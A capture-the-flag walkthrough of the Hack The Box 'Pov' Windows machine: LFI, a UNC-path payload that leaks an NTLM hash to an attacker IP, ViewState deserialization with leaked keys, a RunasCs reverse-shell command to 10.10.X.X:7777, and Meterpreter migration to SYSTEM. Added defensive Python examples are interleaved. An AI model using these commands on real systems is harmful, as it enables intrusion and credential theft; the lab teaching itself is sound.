IP: 10.10.11.251 - Platform: Windows - Difficulty: Medium
RECON
Nmap
nmap reveals that only port 80 is open. That is kinda strange for a typical machine seen on HTB. Most of the boxes tend to open port 22 (commonly referred to as SSH) as a way to get remote access as a user or root. The usual approach would be to grab the creds through some nefarious means and then log in over SSH with them.
nmap -sV -sC -v -T4 10.10.11.251
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: pov.htb
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: E9B5E66DEBD9405ED864CAC17E2A888E
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
FFUF
Using ffuf to search for subdomains that respond differently (status codes 200/300).
Only 1 subdomain returns 302 - dev. Let's add it to /etc/hosts.
GAINING FOOTHOLD
pov.htb provides no indication of a possible attack vector. However, on dev.pov.htb, I stumbled upon LFI (Local File Inclusion) when examining the parameters of the intercepted request in Burp Suite while tinkering with the web download function.
A File Inclusion vulnerability allows an attacker to include a file, usually by exploiting a “dynamic file inclusion” mechanism implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
This can lead to something as simple as outputting the contents of a file, but depending on the severity, it can also lead to:
Code execution on the web server
Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross-site scripting (XSS)
Denial of Service (DoS)
Sensitive Information Disclosure
It took some time to find a few intriguing files:
default.aspx
web.config
contact.aspx
LFI & Responder
What we are going to do here is capture the NTLM hash by using Responder.
Responder will poison MDNS, NBT-NS, and LLMNR.
And you might be asking?
What is LLMNR, NBT-NS, MDNS?
The functions of the protocols LLMNR, NBT-NS, and MDNS are nearly identical.
Based on the Domain Name System packet format, LLMNR (Link-Local Multicast Name Resolution) is a protocol that supports all current and upcoming DNS formats, types, and classes and permits IPv4 and IPv6 hosts.
NBT-NS (NetBIOS Name Service) is a NetBIOS protocol used on Windows to resolve NetBIOS names to IP addresses.
Finally, all of the network's participants are addressed directly via the MDNS (Multicast Domain Name Service) protocol.
If reading this is too tedious for you, just know that Responder would attempt to obtain your NTLM hashes from the network in plain text. If you're lucky, this tool might even give you a clear-text username and password in addition to the password hash.
file=%5C%5C10.10.X.X%5Csomefile
Our payload is basically \\10.10.X.X\somefile wrapped in URL encoding.
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.36]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-71DF2WLMSKI]
Responder Domain Name [4SLY.LOCAL]
Responder DCE-RPC Port [45254]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.251
[SMB] NTLMv2-SSP Username : POV\sfitz
[SMB] NTLMv2-SSP Hash : sfitz::POV:b278d4805eceb79a[...]
And this is a dead end because this hash is uncrackable. :<
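As a defensive counterpart to the LFI and UNC-path trick above (added example code, not part of the write-up or of the target site): the validation a download handler needs before it touches the file parameter. DOWNLOAD_ROOT and the function names are assumptions.

```python
from pathlib import PureWindowsPath
from urllib.parse import unquote

# Added defensive example, not code from the write-up or the target site.
# DOWNLOAD_ROOT is an assumed location for the dev site's downloadable files.
DOWNLOAD_ROOT = PureWindowsPath(r"C:\inetpub\dev\downloads")

def resolve_download(file_param, root=DOWNLOAD_ROOT):
    """Map the user-supplied 'file' value to a path inside root, or None if unsafe."""
    value = file_param
    for _ in range(3):                      # peel double encoding (%255C -> %5C -> \)
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    if not value or any(ord(c) < 0x20 for c in value):
        return None                         # empty, NUL or control characters
    if value.startswith(("\\\\", "//")):
        return None                         # UNC path: the server would authenticate to that host
    p = PureWindowsPath(value)
    if p.anchor or p.drive:                 # rooted (\x), drive (C:) or UNC anchor
        return None
    if not p.parts or any(part == ".." for part in p.parts):
        return None                         # nothing to serve, or traversal (web.config etc.)
    if any(":" in part for part in p.parts):
        return None                         # NTFS alternate data stream (name:stream)
    full = root.joinpath(p)
    if full.parts[:len(root.parts)] != root.parts:
        return None                         # belt and braces: still under root
    return str(full)

def is_safe_download(file_param):
    return resolve_download(file_param) is not None
```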
ViewState Deserialization Exploit
An overview of the approach
So let's talk about ViewState for a little bit:
The ASP.NET framework's default method for maintaining page and control values across web pages is called ViewState. The current state of the page and any values that must be kept during postback are serialized into base64-encoded strings and output in the ViewState hidden field or fields when the HTML for the page is rendered.
ViewState by itself isn't the problem. ASP.NET creates and processes it with the ObjectStateFormatter, which serializes and deserializes the page state; the weakness is that the encryption and signature ASP.NET applies to that serialized data can be compromised.
If the algorithms or keys are exposed, attackers can craft malicious payloads that pass as authentic ViewState and abuse deserialization flaws in ObjectStateFormatter.
-> In this case, we could leverage the encryption and signature keys leaked from the web.config file.
Cracking the nut
With ASP.NET framework ≥ 4.5, we need to supply the decryption algorithm and the decryption key to ysoserial:
In this example, we will be using a simple PowerShell Reverse Shell encoded in Base64:
Finally, after replacing the URL encoded value of the generated payload with the value of the __VIEWSTATE in the above-mentioned request, our payload will be executed.
Now, we have gained a shell as POV\sfitz
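The defender's side of the ViewState chain above, as an added example (not code from the write-up): an audit of the web.config settings that turn a file read into forged ViewState. SAMPLE_WEB_CONFIG is a constructed file with placeholder keys, not the values leaked on the box.

```python
import xml.etree.ElementTree as ET

# Added defensive example, not code from the write-up. SAMPLE_WEB_CONFIG is a
# constructed web.config with placeholder keys, not the values leaked on the box.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <compilation debug="true" targetFramework="4.8" />
    <pages enableViewStateMac="true" />
    <machineKey validationKey="PLACEHOLDER_VALIDATION_KEY"
                decryptionKey="PLACEHOLDER_DECRYPTION_KEY"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>"""

WEAK_VALIDATION = {"MD5", "SHA1", "3DES", "AES"}   # anything older than HMACSHA256
WEAK_DECRYPTION = {"DES", "3DES"}

def audit_machine_key(config_xml):
    """List the settings that let a leaked web.config turn into forged ViewState."""
    findings = []
    root = ET.fromstring(config_xml)
    web = next((child for child in root if child.tag == "system.web"), None)
    if web is None:
        return findings
    pages = web.find("pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("CRITICAL: enableViewStateMac=false, unsigned ViewState is deserialized")
    mk = web.find("machineKey")
    if mk is None:
        return findings          # keys auto-generated per app pool: nothing static to leak
    for attr in ("validationKey", "decryptionKey"):
        if not mk.get(attr, "AutoGenerate").startswith("AutoGenerate"):
            findings.append(f"HIGH: static {attr} in web.config; whoever reads the file "
                            "(LFI, backup, source repo) can sign and encrypt ViewState")
    if mk.get("validation", "HMACSHA256").upper() in WEAK_VALIDATION:
        findings.append(f"MEDIUM: validation={mk.get('validation')}; use HMACSHA256 or stronger")
    if mk.get("decryption", "Auto").upper() in WEAK_DECRYPTION:
        findings.append(f"MEDIUM: decryption={mk.get('decryption')}; use AES")
    return findings
```

Static keys are legitimate in a web farm; the finding is that they must then be treated as secrets and rotated as soon as the file is known to be readable.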
PRIVILEGE ESCALATION
Enumeration
Getting user SIDs:
PS C:\windows\system32\inetsrv> wmic useraccount get name,sid
wmic useraccount get name,sid
Name SID
Administrator S-1-5-21-2506154456-4081221362-271687478-500
alaading S-1-5-21-2506154456-4081221362-271687478-1001
DefaultAccount S-1-5-21-2506154456-4081221362-271687478-503
Guest S-1-5-21-2506154456-4081221362-271687478-501
sfitz S-1-5-21-2506154456-4081221362-271687478-1000
WDAGUtilityAccount S-1-5-21-2506154456-4081221362-271687478-504
So sfitz lacks the privilege to receive the user flag; perhaps alaading does?
After a bit of exploring, I find this file:
Password, Pa$$w0rd, P455w0rd!!!
Can I access the password directly from the PSCredential object?
As you can see, it’s stored as a secure string.
The password will not be returned to you in plain text by $cred.Password.
As opposed to a password in plain text, $cred.Password | ConvertFrom-SecureString will ONLY provide you with cipher data.
The GetNetworkCredential() method is a feature of the PSCredential object. It can be used to decrypt the password stored in the PSCredential object.
When I invoke this method and pipe it to Get-Member, it shows the properties of the object, and you will find a property called Password. Use the command $cred.GetNetworkCredential().Password and it will return the password in plain text.
PS C:\Users\alaading> whoami
pov\alaading
PS C:\Users\alaading> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeDebugPrivilege Debug programs Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Understanding SeDebugPrivilege
By itself, SeDebugPrivilege gives a process the ability to view and modify the memory of other processes. Regardless of security descriptors, SeDebugPrivilege grants the token bearer access to any process or thread.
It's important to remember that attackers frequently enable this privilege in order to gain greater access to thread and process objects. Many C2 agents come with built-in code that allows you to do this instantly.
Because it allows the creation of new remote threads in a target process, malware also takes advantage of this privilege to perform code injection into otherwise trustworthy processes.
RunasCs is a tool that allows you to use explicit credentials to run particular processes with permissions different from what our current shell provides.
As you can see below, RunasCs enables a list of privileges for a specific security token.
PS C:\Users\alaading> .\RunasCs.exe alaading f8g**********1m3 cmd.exe -r 10.10.X.X:7777 --bypass-uac
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-78c62$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 1480 created in background.
Catch it with nc:
Checking the privilege info reveals a surprising discovery:
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeDebugPrivilege Debug programs Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
C:\Windows\system32>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeDebugPrivilege Debug programs Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
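A detection-side note, added here and not part of the write-up: the Disabled/Enabled flip shown above is what Windows Security event 4703 ("A token right was adjusted") records, so it is the place to watch for SeDebugPrivilege being enabled by unexpected binaries. The condensed records, TRUSTED_DIRS and the function names are assumptions for the example.

```python
from dataclasses import dataclass

# Added detection example, not code from the write-up. SAMPLE_4703 is a
# constructed, condensed rendering of Windows Security event 4703 ("A token
# right was adjusted", needs the Token Right Adjusted audit subcategory) as
# pipe-separated fields: EventID|Subject|LogonID|Process|Enabled|Disabled.
# Logon ids and paths are invented; RunasCs.exe sits where the write-up ran it.
SAMPLE_4703 = """\
4703|POV\\alaading|0x5c21|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|SeDebugPrivilege|-
4703|POV\\alaading|0x5c21|C:\\Windows\\System32\\cmd.exe|SeChangeNotifyPrivilege|-
4703|POV\\alaading|0x5c21|C:\\Users\\alaading\\RunasCs.exe|SeDebugPrivilege,SeImpersonatePrivilege|-
4703|NT AUTHORITY\\SYSTEM|0x3e7|C:\\Windows\\System32\\lsass.exe|SeDebugPrivilege|-
4672|POV\\alaading|0x5c21|-|-|-
"""

# Assumed baseline, tune per environment: binaries under these directories
# enable SeDebugPrivilege routinely (powershell.exe does so at startup, which
# is why the whoami output above flips to Enabled), so they rate INFO only.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\")

@dataclass
class TokenAdjust:
    subject: str
    logon_id: str
    process: str
    enabled: set

def parse_4703(text):
    """Parse the condensed records, keeping only event 4703."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        event_id, subject, logon_id, process, enabled, _disabled = line.split("|")
        if event_id != "4703":
            continue
        privs = set() if enabled == "-" else set(enabled.split(","))
        events.append(TokenAdjust(subject, logon_id, process, privs))
    return events

def sedebug_alerts(events):
    """(severity, subject, process) for every SeDebugPrivilege enable outside SYSTEM."""
    alerts = []
    for ev in events:
        if "SeDebugPrivilege" not in ev.enabled or ev.subject.upper() == "NT AUTHORITY\\SYSTEM":
            continue                 # SYSTEM holds the right by design; nothing to learn
        severity = "INFO" if ev.process.lower().startswith(TRUSTED_DIRS) else "HIGH"
        alerts.append((severity, ev.subject, ev.process))
    return alerts
```

Event 4703 is noisy on a busy host, which is why the severity split keys on where the binary lives rather than on the privilege alone.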
With SeDebugPrivilege enabled, we can upload a Meterpreter shell to the machine and leverage it to gain access as Administrator.
Now, one of the oldest tricks in the book is to migrate into another Windows process:
There are many cases where you need to "migrate" a specific working Windows process, typically a shell:
An unstable shell.
Migrating from a 32-bit process to a 64-bit process.
Dealing with exploits that require an interactive session.
This can be easily completed if you have a Meterpreter shell. All you have to do is wait for process migration to occur after launching the "migrate" command with the PID specified. In technical terms, by creating a thread inside another process, this is more of a malicious code injection than a true migration, and Meterpreter is exceptional at doing this. It creates a new remote thread and injects your current session into it, along with all of your loaded extensions and configurations.
By migrating into a more privileged process, we should be able to gain NT AUTHORITY\SYSTEM:
Lastly, take the PID and let Meterpreter handle everything:
(Meterpreter 5)(C:\Windows\system32) > migrate 340
[*] Migrating from 552 to 340...
[*] Migration completed successfully.
(Meterpreter 5)(C:\Windows\system32) > shell
Process 4196 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0899-6CAF
Directory of C:\Users\Administrator\Desktop
01/15/2024 04:11 AM <DIR> .
01/15/2024 04:11 AM <DIR> ..
01/29/2024 10:53 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,227,570,688 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
441fb********************3f76ce1
It is also possible to migrate into winlogon or explorer.
Luckily, the .NET deserialization tool includes a ViewState-specific feature. The vulnerability in ObjectStateFormatter deserialization comes from the use of known keys and algorithms to impersonate ViewState encryption and signatures.
As we could see on this machine, alaading does not have SeDebugPrivilege enabled. So, to bypass this, we could import .
Avada Kedavra
There is a port open on localhost, so another possible approach is port forwarding by using then (or Cobalt Strike, Sliver, Havoc C2)